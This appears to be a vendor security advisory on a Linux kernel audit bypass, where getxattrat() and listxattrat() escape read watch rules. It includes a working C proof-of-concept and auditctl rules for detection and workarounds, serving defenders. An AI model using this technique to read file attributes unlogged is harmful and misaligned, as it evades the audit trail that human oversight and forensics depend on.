CVE-2026-23241 Overview
A vulnerability has been identified in the Linux kernel's audit subsystem: the "at" variants of getxattr() and listxattr(), namely getxattrat() and listxattrat(), were never added to the audit read class. Any local process that is already permitted to read a file's extended attributes can therefore do so through getxattrat() or listxattrat() without matching the watch rules written for read access, leaving no audit record of the read and evading monitoring that relies on those rules.
Critical Impact
A local user can read extended file attributes without triggering audit watch rules, so reads of sensitive metadata go unrecorded. The flaw grants no additional access: the "at" syscalls go through the same DAC and LSM permission checks as getxattr() and listxattr(). What it breaks is the audit trail that security monitoring and forensic analysis rely on.
Affected Products
- Linux Kernel: releases that include the getxattrat() and listxattrat() syscalls (introduced in Linux 6.13) and predate the fix
Discovery Timeline
- 2026-03-17 - CVE CVE-2026-23241 published to NVD
- 2026-03-18 - Last updated in NVD database
Technical Details for CVE-2026-23241
Vulnerability Analysis
This vulnerability is a bypass of a security control in the Linux kernel's audit framework. The audit subsystem logs syscalls that match loaded rules. For file watches, the rule language does not name syscalls at all: a rule such as -w PATH -p r asks for "read access to PATH", and the kernel expands that permission into a fixed list of syscalls, the audit read class (there are similar classes for write, execute and attribute-change permissions). A syscall that is missing from that list can never match a -p r watch, however the file is accessed.
getxattrat() and listxattrat() are the "at" variants of getxattr() and listxattr(). Like the other *at() syscalls they take a directory file descriptor and resolve a relative path against it instead of the current working directory (AT_FDCWD restores the classic behaviour), they accept the AT_SYMLINK_NOFOLLOW and AT_EMPTY_PATH flags, and getxattrat() passes its value buffer through a struct xattr_args rather than as bare pointer and size arguments. Functionally they read exactly the same data as the classic calls: extended attributes such as SELinux labels (security.selinux), POSIX ACLs (system.posix_acl_access), file capabilities (security.capability) and application metadata in the user.* namespace.
Because the two syscalls were never classified into the audit read class, watch rules that request read monitoring on a file do not match them, even though the equivalent getxattr() or listxattr() call on the same file is logged.
Root Cause
The root cause is an incomplete syscall classification in the Linux kernel's audit subsystem. When getxattrat() and listxattrat() were implemented, they were not added to the kernel's read-class syscall list (the list that backs AUDIT_CLASS_READ), so every rule that relies on that class ignores them. A watch such as -w /tmp/test -p rwa -k test_rwa therefore records getxattr("/tmp/test", ...) but stays silent for getxattrat(dfd, "test", ...) on the same file. Note that the class only affects permission-based watches: a rule that names the syscall explicitly (-S getxattrat) matches on syscall number and is unaffected, which is what the workaround below relies on.
Attack Vector
An attacker with local access, and with whatever DAC and LSM permissions are already required to read the attributes in question, can exploit this vulnerability to read extended attributes without generating audit records. The attack scenario involves:
- Identifying files with valuable extended attributes (ACLs, security labels, capabilities)
- Using getxattrat() or listxattrat() instead of the standard variants
- Successfully reading the extended attributes while bypassing configured audit rules
This allows for stealthy reconnaissance and information gathering on systems where audit logging is relied upon for security monitoring and forensic analysis.
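The bypass described above is easy to reproduce against a watch rule. The following C program is an added example, not code from the advisory or from the kernel tree: it sets a user.demo attribute on /tmp/xattr-demo (an assumed path), reads it back once with getxattr() and once with getxattrat(), then lists it with listxattrat(). With a watch such as `auditctl -w /tmp/xattr-demo -p r -k xattr_demo` loaded, an unpatched kernel shows only the first read under `ausearch -k xattr_demo`; a fixed kernel shows all three. The fallback syscall numbers 464 and 465 and the struct layout are those of the Linux 6.13 unified syscall table; the program calls the raw syscalls because glibc may not provide wrappers, and it reports ENOSYS on kernels that predate them.

```c
/* Added example (not from the original advisory or the kernel source): read the
 * same extended attribute through getxattr() and getxattrat(), and list it through
 * listxattrat(), so the calls can be compared against an audit watch on the file.
 * Assumptions: Linux 6.13+ xattrat ABI (unified syscall numbers 464/465, struct
 * xattr_args as below); demo path /tmp/xattr-demo; run as root with
 *   auditctl -w /tmp/xattr-demo -p r -k xattr_demo
 * loaded, then inspect `ausearch -k xattr_demo`. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/xattr.h>
#include <unistd.h>

#ifndef __NR_getxattrat
#define __NR_getxattrat 464   /* Linux 6.13+; same number on every architecture */
#endif
#ifndef __NR_listxattrat
#define __NR_listxattrat 465
#endif

/* Same layout as struct xattr_args in <linux/xattr.h> (6.13+); a local name so
 * the program also builds against older headers. */
struct demo_xattr_args {
    uint64_t value;  /* pointer to the value buffer, as a 64-bit integer */
    uint32_t size;   /* buffer size */
    uint32_t flags;  /* XATTR_CREATE/XATTR_REPLACE for set*; 0 for get */
};

/* Raw wrappers: return the attribute/list length, or -errno on failure
 * (-ENOSYS on a kernel that predates the xattrat syscalls). */
long getxattrat_raw(int dfd, const char *path, unsigned at_flags,
                    const char *name, void *buf, size_t len)
{
    struct demo_xattr_args args = {
        .value = (uint64_t)(uintptr_t)buf, .size = (uint32_t)len, .flags = 0
    };
    long r = syscall(__NR_getxattrat, dfd, path, at_flags, name, &args, sizeof args);
    return r < 0 ? -errno : r;
}

long listxattrat_raw(int dfd, const char *path, unsigned at_flags,
                     char *buf, size_t len)
{
    long r = syscall(__NR_listxattrat, dfd, path, at_flags, buf, len);
    return r < 0 ? -errno : r;
}

/* listxattr(at) fills buf with NUL-terminated names back to back; count them.
 * Pure helper, so it can be exercised without a kernel that has the syscalls. */
size_t count_xattr_names(const char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == '\0')
            n++;
    return n;
}

int main(void)
{
    const char *dir = "/tmp", *file = "xattr-demo";   /* assumed demo location */
    char path[64];
    snprintf(path, sizeof path, "%s/%s", dir, file);

    int fd = open(path, O_CREAT | O_WRONLY, 0600);
    if (fd < 0) { perror("open"); return 1; }
    close(fd);
    /* Constructed sample attribute; fails with ENOTSUP on filesystems without user xattrs. */
    if (setxattr(path, "user.demo", "secret", 6, 0) < 0) { perror("setxattr"); return 1; }

    char val[64];
    /* Classic call: in the audit read class, so the -p r watch records it. */
    ssize_t n = getxattr(path, "user.demo", val, sizeof val);
    printf("getxattr    -> %zd bytes\n", n);

    /* "at" call on the same file: same permission checks, same data, but not in
     * the read class on unpatched kernels, so the watch stays silent. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dfd < 0) { perror("open dir"); return 1; }
    long m = getxattrat_raw(dfd, file, 0, "user.demo", val, sizeof val);
    if (m < 0)
        printf("getxattrat  -> %s\n", strerror((int)-m));
    else
        printf("getxattrat  -> %ld bytes\n", m);

    char names[256];
    long l = listxattrat_raw(dfd, file, 0, names, sizeof names);
    if (l < 0)
        printf("listxattrat -> %s\n", strerror((int)-l));
    else
        printf("listxattrat -> %zu name(s)\n", count_xattr_names(names, (size_t)l));
    close(dfd);
    return 0;
}
```

Run it as root on ext4 or xfs (use one of those if setxattr fails with ENOTSUP), then compare `ausearch -k xattr_demo` before and after the kernel update. The same program is a convenient check for the temporary -S rule in the workarounds: once that rule is loaded, the getxattrat and listxattrat records must appear under the rule's key.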
Detection Methods for CVE-2026-23241
Indicators of Compromise
- Unexpected use of getxattrat() or listxattrat() syscalls in process traces
- Gaps in audit logs where file attribute access is expected but not recorded
- Evidence of extended attribute access in application logs not corroborated by audit trails
- Suspicious processes accessing sensitive files without corresponding audit events
Detection Strategies
- Enable syscall-level tracing: strace for one-off verification of a single process, or an eBPF program attached to the syscalls:sys_enter_getxattrat and syscalls:sys_enter_listxattrat tracepoints (or the raw_syscalls tracepoint filtered on their numbers) for fleet-wide capture of all xattr-related syscalls
- Add auditd syscall rules that name getxattrat and listxattrat directly (-S, together with -F arch=); these match on syscall number and do not depend on the read class. Use the numbers from your architecture's syscall table if the installed auditctl does not recognise the names
- Deploy kernel-level monitoring solutions that operate independently of the audit framework
- Review system logs for discrepancies between expected and actual audit coverage
Monitoring Recommendations
- Monitor for processes using the "at" variants of xattr syscalls through alternative logging mechanisms
- Implement SentinelOne Singularity Platform for comprehensive kernel-level visibility that does not depend solely on audit framework classification
- Regularly verify audit rule coverage against actual syscall usage patterns
- Set up alerts for any security-sensitive file access that should generate audit events but doesn't appear in logs
How to Mitigate CVE-2026-23241
Immediate Actions Required
- Apply the kernel patches that add the missing syscalls to the audit read class
- Temporarily add explicit -S audit rules for getxattrat and listxattrat (by name, or by syscall number if the installed auditctl does not know the names)
- Review recent audit logs for potential gaps in monitoring coverage
- Assess systems where audit compliance is critical for potential exposure during the vulnerability window
Patch Information
The Linux kernel maintainers have released patches to address this vulnerability. The fix adds the missing getxattrat() and listxattrat() syscalls to the audit read class, ensuring proper logging of these operations.
Relevant kernel commits:
- Commit a2e8c144299c31d3972295ed80d4cb908daf4f6f
- Commit ad37505ce869a8100ff23f24eea117de7a7516bf
- Commit bcb90a2834c7393c26df9609b889a3097b7700cd
For additional technical details on the discovery, see the Benc Teux Syscalls Audit Blog.
Workarounds
- Add explicit -S audit rules for getxattrat and listxattrat until patches can be applied, and confirm the rule fires by reading an attribute through the "at" path and checking ausearch for the rule's key
- Deploy supplementary monitoring tools that capture syscall activity independently of the audit class definitions
- Use application-layer logging to track extended attribute access where possible
- Consider restricting access to sensitive files through additional access controls while awaiting kernel updates
# Example: explicit syscall rules for the two syscalls the read class misses. A -S rule
# matches on syscall number, so it fires whether or not the class list is patched.
# -F arch=b64 is required on biarch systems (add an arch=b32 copy if 32-bit binaries matter).
# If auditctl does not know the names, use the numbers from `ausyscall --dump` or from
# __NR_getxattrat/__NR_listxattrat in your architecture's unistd header (464 and 465 on
# the unified syscall table at the time of writing).
auditctl -a always,exit -F arch=b64 -S getxattrat -S listxattrat -k xattr_bypass_monitor
ausearch -k xattr_bypass_monitor --start recent   # confirm events appear after a test read
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

